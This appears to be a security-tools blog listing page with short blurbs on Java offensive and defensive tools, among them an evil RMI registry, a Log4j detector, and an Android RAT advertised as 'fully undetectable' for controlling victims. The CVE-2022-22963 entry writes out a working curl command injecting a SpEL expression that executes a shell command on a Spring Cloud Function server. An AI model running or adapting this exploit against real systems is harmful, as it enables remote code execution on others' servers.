Ermir – An Evil Java RMI Registry

Ermir is an Evil/Rogue RMI Registry, it exploits unsecure deserialization on any Java code calling standard RMI methods on it (list()/lookup()/bind()/rebind()/unbind()). Requirements Ruby v3 or newer. Installation Install Ermir from rubygems.org: $ gem install ermir or clone the repo and build the gem: $ git clone https://github.com/hakivvi/ermir.git$ rake install Usage Ermir is a cli gem,Read More

Java-Remote-Class-Loader – Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API

This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The client receives the class file from the server and return the respective execution output. Payloads must be written in Java and compiled beforeRead More

CVE-2022-22963 – PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter’ Or using Burp suite: Credits https://github.com/hktalent/spring-spel-0day-poc Download CVE-2022-22963

Zkar – A Java Serialization Protocol Analysis Tool Implement In Go

ZKar is a Java serialization protocol analysis tool implement in Go. This tool is still work in progress, so no complete API document and contribution guide. ZKar provides: A Java serialization payloads parser and viewer in pure Go, no CGO or JDK is required From the Java serialization protocol to a Go struct A GoRead More

Log4J-Detect – Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Multithreading

Simple Python 3 script to detect the “Log4j” Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script “log4j-detect.py” developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228. To do so, it sends a GET request using threads (higher performance) to each of theRead More

Mariana Trench – Security Focused Static Analysis Tool For Android And Java Applications

Mariana Trench is a security focused static analysis platform targeting Android. This guide will walk you through setting up Mariana Trench on your machine and get you to find your first remote code execution vulnerability in a small sample app. These instructions are also available at our website. Prerequisites Mariana Trench requires a recent versionRead More

JVMXRay – Make Java Security Events Of Interest Visible For Analysis

JVMXRay is a technology for monitoring access to system resources within the Java Virtual Machine. It’s designed with application security emphasis but some will also find it beneficial for software quality processes and diagnostics. More about Oracle Java Duke mascot… Contact/Chat Group New chat information forthcoming. Benefits Following is a quick list of some ofRead More

Rafel-Rat – Android Rat Written In Java With WebPanel For Controlling Victims

Rafel is Remote Access Tool Used to Control Victims Using WebPanel With More Advance Features. Main Features Admin Permission Add App To White List Looks Like Browser Runs In Background Even App is Closed(May not work on some Devices) Accessibility Feature Support Android v5 – v10 No Port Forwarding Needed Acquire Wakelock Fully Undetectable PrerequisitesRead More

Remote-Method-Guesser – Tool For Java RMI Enumeration And Bruteforce Of Remote Methods

remote-method-guesser (rmg) is a command line utility written in Java and can be used to identify security vulnerabilities on Java RMI endpoints. Currently, the following operations are supported: List available bound names and their corresponding interface class names List codebase locations (if exposed by the remote server) Check for known vulnerabilities (enabled class loader, missingRead More

RMIScout – Wordlist And Bruteforce Strategies To Enumerate Java RMI Functions And Exploit RMI Parameter Unmarshalling Vulnerabilities

RMIScout performs wordlist and bruteforce attacks against exposed Java RMI interfaces to safely guess method signatures without invocation.On misconfigured servers, any known RMI signature using non-primitive types (e.g., java.lang.String), can be exploited by replacing the object with a serialized payload. This is a fairly common misconfiguration (e.g., VMWare vSphere Data Protection + vRealize Operations Manager,Read More

X